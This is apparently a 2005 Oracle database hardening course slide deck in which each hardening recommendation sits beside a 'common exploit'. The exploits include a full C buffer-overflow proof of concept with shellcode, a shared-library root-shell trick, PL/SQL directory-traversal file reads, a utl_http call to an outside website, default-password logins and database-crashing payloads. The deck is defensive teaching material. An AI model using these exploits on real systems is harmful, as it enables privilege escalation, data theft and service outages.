Upload
vuongphuc
View
220
Download
3
Embed Size (px)
Citation preview
Alexander Kornbrust, 26-Sep-2005 V1.00 1Red-Database-Security GmbH
IT Summerschool RWTH Aachen
Oracle Database Basic Hardening & Common Exploits
Alexander Kornbrust26-September-2005
Alexander Kornbrust, 26-Sep-2005 V1.00 2Red-Database-Security GmbH
Table of content
• Apply latest security patches• X11 security• Cleartext passwords• File permission & settings• Listener security• External users• Default passwords• Mighty packages• Password Verify Function• Oracle profile• System tablespace• Init.ora settings
Alexander Kornbrust, 26-Sep-2005 V1.00 3Red-Database-Security GmbH
Apply latest security patches
• 8.1.7.4• 9.1.0.5• 9.2.0.6• 9.2.0.7• 10.1.0.2• 10.1.0.3• 10.1.0.4• 10.2.0.1• Common Exploits are available on the internet.
Apply latest security patches on top of the latest patchsets
Alexander Kornbrust, 26-Sep-2005 V1.00 4Red-Database-Security GmbH
X11 Security
The Oracle documentation (until 10.2) recommends to run the xhost+ command before you start the installation.
Never use xhost+ because it opens the server to everyone.
Solution
• Make use of any access control mechanisms provided by the operating system and window system to prevent theft of workstation display contents or keystrokes
• Inform users to not use the 'xhost +' command and/or disable it
• Check for xsessions files with 'xhost +' enabled and stop doing this
• Disable broadcast and/or indirect XDM requests for any X terminals that you don't explicitly want to support
Alexander Kornbrust, 26-Sep-2005 V1.00 5Red-Database-Security GmbH
References for X11 Security
• Crash Course in X Windows Security ( http://www.hack.gr/users/atlantis/windows.html )
• Safely Using the X Window System and "Securing X Windows" by John Fisher of CIAC
Alexander Kornbrust, 26-Sep-2005 V1.00 6Red-Database-Security GmbH
Common Exploits for X11
• Read keyboard (see DVD: xkey.c)
• Dump X11 windows
Alexander Kornbrust, 26-Sep-2005 V1.00 7Red-Database-Security GmbH
Unix-history files (.bash_history/.sh_history) often contain command lines with cleartextpasswords (e.g. sqlplus system/secretpw).
Solution
Edit the history files on a regular basis and remove the passwords.
Cleartext Passwords
Alexander Kornbrust, 26-Sep-2005 V1.00 8Red-Database-Security GmbH
Common Exploit
Read Unix-History files via utl_file or dbms_lob and directory traversalBEGIN
Lob_loc:= BFILENAME('MEDIA_DIR', '../../../.sh_history');DBMS_LOB.OPEN (Lob_loc, DBMS_LOB.LOB_READONLY);
LOOPDBMS_LOB.READ (Lob_loc, Amount, Position, Buffer);dbms_output.putline(utl_raw.cast_to_varchar2(Buffer));Position := Position + Amount;
END LOOP;
END IF;
DBMS_LOB.CLOSE (Lob_loc);
END;
Alexander Kornbrust, 26-Sep-2005 V1.00 9Red-Database-Security GmbH
Remove cleartext passwords from the environment.If an attacker compromise a system he get the passwords easily (set command).
SolutionRewrite your scripts and never use plaintext
passwords in the environment.
Cleartext Passwords in environment
Alexander Kornbrust, 26-Sep-2005 V1.00 10Red-Database-Security GmbH
Common Exploit
http://server/fcgi-bin/echo.exe
Alexander Kornbrust, 26-Sep-2005 V1.00 11Red-Database-Security GmbH
Common Exploit
Run an operating system command (e.g. env or set) from SQL*Plus via extproc or Java
Alexander Kornbrust, 26-Sep-2005 V1.00 12Red-Database-Security GmbH
Executables with s-bits
Remove s-bits from oracle filese.g. dbsnmp
Solution1. Search files with s-bits
find . -type f -perm -4000 -print2. Remove s-bit
chmod –s dbsnmp
Alexander Kornbrust, 26-Sep-2005 V1.00 13Red-Database-Security GmbH
Common Exploit (become root)
----[ora9i]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so libthread.so.1 => /usr/lib/libthread.so.1libkstat.so.1 => /usr/lib/libkstat.so.1....
Erzeugen einer neuen Library, die von dbsnmp verwendet wird:#include#include
_init() { printf("PID=%i EUID=%i",getpid(),getuid());setuid(0);system("/usr/bin/ksh");}
Alexander Kornbrust, 26-Sep-2005 V1.00 14Red-Database-Security GmbH
Remove x-executable from the Oracle executables for all users. The Oracle executable has a s-bit and some versions are vulnerable against a buffer overflow (exploit available via internet)
Solution
chmod o-x oracle
Execution Permission
Alexander Kornbrust, 26-Sep-2005 V1.00 15Red-Database-Security GmbH
Common Exploit 1:#################include <stdio.h>#include <stdlib.h> #include <string.h> #include <unistd.h> #define VER "Operation_Oracle_Owner_Ownage_Overflow_Oday Version 1.0.1" #define PADDING 0x90 #define RIMSHOT 9850 //#define BUFF 15000 char oracle_crusher_char[] = "\x31\xc0\xb0\x01\xcd\x80"; unsigned long retrieve_offset() { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { char Bucket[RIMSHOT]; long badd_addr; short delta = 0; short i; if(argc > 1) { delta = atol(argv[1]); } badd_addr = retrieve_offset() - delta; printf("\n\n*************************************************************\n"
Alexander Kornbrust, 26-Sep-2005 V1.00 16Red-Database-Security GmbH
Common Exploit 1:
"*************************************************************\n"); printf("[-] %s\n", VER); printf("[-] Bug discovered and PoC developed by c0ntexhushmail.com.\n" "[-] --------------------------------------------------------\n" "[-] Fresh 0day PoC oracle && oracleO buffer overflow exploit\n" "[-] Offset values from 1750 - 3500 should work perfectly, k.\n" "[-] Run it and ltrace -o outout ./oracle_owned for goodness.\n" "[-] --------------------------------------------------------\n" "[-] gcc -Wall -o oracle_owned oracle_owned.c\n" "[-] --------------------------------------------------------\n" "[-] Usage: %s offset_value\n", argv[0]); for(i = 0; i < RIMSHOT; i += 4) *(long *) &Bucket[i] = badd_addr; for(i = 0; i < (RIMSHOT - strlen(oracle_crusher_char) - 100); i++) *(Bucket + i) = PADDING; memcpy(Bucket + i, oracle_crusher_char, strlen(oracle_crusher_char)); printf("[-] Using Return address 0x%lx\n", badd_addr); printf("[-] Using offset value %d\n", delta); printf("*************************************************************\n" "*************************************************************\n\n"); execlp("/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle", "oracle", Bucket, NULL); return 0; }################
Alexander Kornbrust, 26-Sep-2005 V1.00 17Red-Database-Security GmbH
Remove old versions
Remove old, vulnerable executables/libraries
• dbsnmp0• oracle0
Solutionrm dbsnmp0
Alexander Kornbrust, 26-Sep-2005 V1.00 18Red-Database-Security GmbH
Check file and directory permission on a regular base
Oracle recommends to set the umask=022. The result of this setting is a world readable export file.
Very often these (full) export files contain the entire database
drwxr-xr-x 2 oracle dba 512 Apr 23 09:00 .drwxr-xr-x 4 oracle dba 512 Apr 18 2004 ..-rw-r--r-- 1 oracle dba 22439264450 Aug 23 05:24 full_export.dmp
Check file permission
Alexander Kornbrust, 26-Sep-2005 V1.00 19Red-Database-Security GmbH
Common Exploit
Copy dump-files from the Oracle-Home directory
#johndoe> cp /home/oracle/dump/full_export.dmp ~/.
Alexander Kornbrust, 26-Sep-2005 V1.00 20Red-Database-Security GmbH
Remove sources and application code from the database server to avoid hints for the developer
Remove unneeded sources
Alexander Kornbrust, 26-Sep-2005 V1.00 21Red-Database-Security GmbH
Securing TNS Listener
• Set Listener Password (up to 9i Rel.2)
• Set ADMIN_RESTRICTIONS
• Remove unneeded Services
Alexander Kornbrust, 26-Sep-2005 V1.00 22Red-Database-Security GmbH
Common Exploits
• Stop listener via lsnrctl Stop
• Change listener.log name to .rhosts and send a specially crafted tns packet
Details see presentation “Listener Security”
Alexander Kornbrust, 26-Sep-2005 V1.00 23Red-Database-Security GmbH
External (OPS$) user
For historical reasons Oracle still supports externalusers. These database users are authenticated by theoperating system.
Anyone with access to an external O/S account (e.g. boot Linux from a boot-CD) can access the databasewithout further authentication.
TO use this the init.ora-parameterREMOTE_IS_AUTHENT must be TRUE.
If REMOTE_IS_AUTHENT is FALSE is used for trustedconnections like ASO (Radius), Windows, …
Alexander Kornbrust, 26-Sep-2005 V1.00 24Red-Database-Security GmbH
Common Exploit
Create different OS accounts like oracle, admin, administrator …and login from thise operating system account.
Alexander Kornbrust, 26-Sep-2005 V1.00 25Red-Database-Security GmbH
Remove Default Passwords
• outln/outln• dbsnmp/dbsnmp• system/manager• sys/change_on_install• scott/tiger
Solution - change database passwords:alter user outln identified by my!top112123;
Password is transferred in plaintext over the network
Better solution in SQL*PlusSQL> passwords outln
Or use Oracle Advanced Security (ASO)
Alexander Kornbrust, 26-Sep-2005 V1.00 26Red-Database-Security GmbH
Common Exploit 1
Connect with default password and escalate privileges
sqlplus scott/tiger@db
sqlplus system/manager@db
sqlplus sys/change_on_install@db
sqlplus outln/outln@db
Alexander Kornbrust, 26-Sep-2005 V1.00 27Red-Database-Security GmbH
Common Exploit 2
Sniff passwords the trace file functionality.
TRACE_FILE_SERVER=training.trcTRACE_DIRECTORY_SERVER=c:\tempTRACE_LEVEL_SERVER=SUPPORT
SQL> alter user scott identified by tiger;User altered.
[24-JUN-2005 13:11:20:527] nsprecv: 74 65 72 20 75 73 65 72 |ter.user|[24-JUN-2005 13:11:20:527] nsprecv: 20 73 63 6F 74 74 20 69 |.scott.i|[24-JUN-2005 13:11:20:527] nsprecv: 64 65 6E 74 69 66 69 65 |dentifie|[24-JUN-2005 13:11:20:527] nsprecv: 64 20 62 79 20 74 69 67 |d.by.tig|[24-JUN-2005 13:11:20:527] nsprecv: 65 72 01 00 00 00 01 00 |er......|
Alexander Kornbrust, 26-Sep-2005 V1.00 28Red-Database-Security GmbH
Common Exploit 2
Sniff passwords with ethereal
Alexander Kornbrust, 26-Sep-2005 V1.00 29Red-Database-Security GmbH
Connect:ALTER SESSIONCREATE CLUSTERCREATE DATABASE LINKCREATE SEQUENCECREATE SESSIONCREATE SYNONYMCREATE TABLECREATE VIEW
Resource:CREATE CLUSTERCREATE INDEXTYPECREATE OPERATORCREATE PROCEDURECREATE SEQUENCECREATE TABLECREATE TRIGGERCREATE TYPE
Sanitize default role Oracle (up to 10.1.x) CONNECT and RESOURCE
Sanitize Connect and Resource Role
Alexander Kornbrust, 26-Sep-2005 V1.00 30Red-Database-Security GmbH
Common Exploit
Crash the database with a bug in the create database link:SQL> create database link crash using 'iasdb11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd11111111111';2 3*Error in line 1:ORA-03113: end-of-file on communication channel
Alexander Kornbrust, 26-Sep-2005 V1.00 31Red-Database-Security GmbH
Use password verify function and assign this function to all profiles
SolutionModify and install the password verification function UTLPWDMG.sql and assign this function to the default profile.
SQL> alter profile default limit password_verify_function verify_function;
Password Verify Function
Alexander Kornbrust, 26-Sep-2005 V1.00 32Red-Database-Security GmbH
Enable Auditing for SYS and normal users
It is not possible to audit SYS in 8i and lower.
Solution
• audit session;• audit create user;• set value audit_sys_operations (init.ora/pfile) to TRUE
and restart the database
Alexander Kornbrust, 26-Sep-2005 V1.00 33Red-Database-Security GmbH
Remove Public Grants from mighty packages
• utl_http• utl_smtp• utl_tcp• utl_file• utl_inaddr• dbms_lob• dbms_export_extension• dbms_sql
Remove also mighty packages reachable via dblinks
Alexander Kornbrust, 26-Sep-2005 V1.00 34Red-Database-Security GmbH
Common Exploit 1
Many versions of Oracle utl_file and dbms_lobare vulnerable against directory traversal.Everybody with an Oracle account can read every file on the database serverBEGIN
Lob_loc:= BFILENAME('MEDIA_DIR', ‘myfile.txt'); DBMS_LOB.OPEN (Lob_loc, DBMS_LOB.LOB_READONLY);
LOOP DBMS_LOB.READ (Lob_loc, Amount, Position, Buffer);
dbms_output.putline(utl_raw.cast_to_varchar2(Buffer)); Position := Position + Amount; END LOOP;
END IF; DBMS_LOB.CLOSE (Lob_loc);
END;
Alexander Kornbrust, 26-Sep-2005 V1.00 35Red-Database-Security GmbH
Common Exploit 2
Send information to an external websiteSET serveroutput ON SIZE 40000 DECLARE
req utl_http.req; resp utl_http.resp; value VARCHAR2(1024);
BEGIN
utl_http.set_proxy('172.20.96.10:8080');
req := utl_http.begin_request('http://www.heise.de');utl_http.set_header(req, 'User-Agent', 'Mozilla/4.0'); resp := utl_http.get_response(req); LOOP utl_http.read_line(resp, value, TRUE); dbms_output.put_line(value); END LOOP; utl_http.end_response(resp);
EXCEPTIONWHEN utl_http.end_of_body THENutl_http.end_response(resp);
END;
Other options: Send information via DNS
Alexander Kornbrust, 26-Sep-2005 V1.00 36Red-Database-Security GmbH
Modify the profile for oracle users to avoid brute force and denial of service attacks.
Solution
SQL> ALTER PROFILE default LIMITFAILED_LOGIN_ATTEMPTS 5PASSWORD_VERIFY_FUNCTION verifiy_funcPASSWORD_LOCK_TIME 1/48PASSWORD_GRACE_TIME 10;
Brute Force Attacks
Alexander Kornbrust, 26-Sep-2005 V1.00 37Red-Database-Security GmbH
Common Exploits
• Brute force Oracle user accounts
• D.o.S. via concurrent users (to reach the limit “processes”). Create 300 (if processes=300) concurrent sessions.
oracle@raclinux1:~> sqlplus scott/tigerSQL*Plus: Release 9.0.2.6 – ProductionCopyright (c) 1982, 2003, Oracle. All rights reserved.
ERROR:ORA-00020: maximum number of processes (%s) exceeded
Alexander Kornbrust, 26-Sep-2005 V1.00 38Red-Database-Security GmbH
Check if the SYSTEM tablespace is used by users different than SYS/SYSTEM
SYSTEM tablespace
Alexander Kornbrust, 26-Sep-2005 V1.00 39Red-Database-Security GmbH
Common Exploit
Fill the system tablespace with garbage
Alexander Kornbrust, 26-Sep-2005 V1.00 40Red-Database-Security GmbH
Check if O7_DICTIONARY_ACCESSIBILITY is set to FALSE
SolutionSET O7_DICTIONARY_ACCESSIBILITY to FALSE
Check if SQL92_SECURITY is set to TRUE
SolutionSET SQL92_SECURITY to TRUE
Init.ora settings
Alexander Kornbrust, 26-Sep-2005 V1.00 41Red-Database-Security GmbH
Common Exploit
Read any data dictionary table if the permission „SELECT ANY TABLE“ is granted.
Alexander Kornbrust, 26-Sep-2005 V1.00 42Red-Database-Security GmbH
Check if MAX_DUMP_FILE_SIZE is not set to unlimited
Solution• good partition/file system design (trace and dump
files on a separate partition)• set MAX_DUMP_FILE_SIZE in the init.ora• alter session set max_dump_file_size=64M;
Init.ora settings
Alexander Kornbrust, 26-Sep-2005 V1.00 43Red-Database-Security GmbH
Common Exploit
An attacker could create a large dump file and fill the partition
Alexander Kornbrust, 26-Sep-2005 V1.00 44Red-Database-Security GmbH
Excercise
Excercise
Alexander Kornbrust, 26-Sep-2005 V1.00 45Red-Database-Security GmbH
Alexander Kornbrust
Red-Database-Security GmbHBliesstrasse 16D-66538 NeunkirchenGermany
Telefon: +49 (0)6821 – 95 17 637Fax: +49 (0)6821 – 91 27 354E-Mail: [email protected]
Contact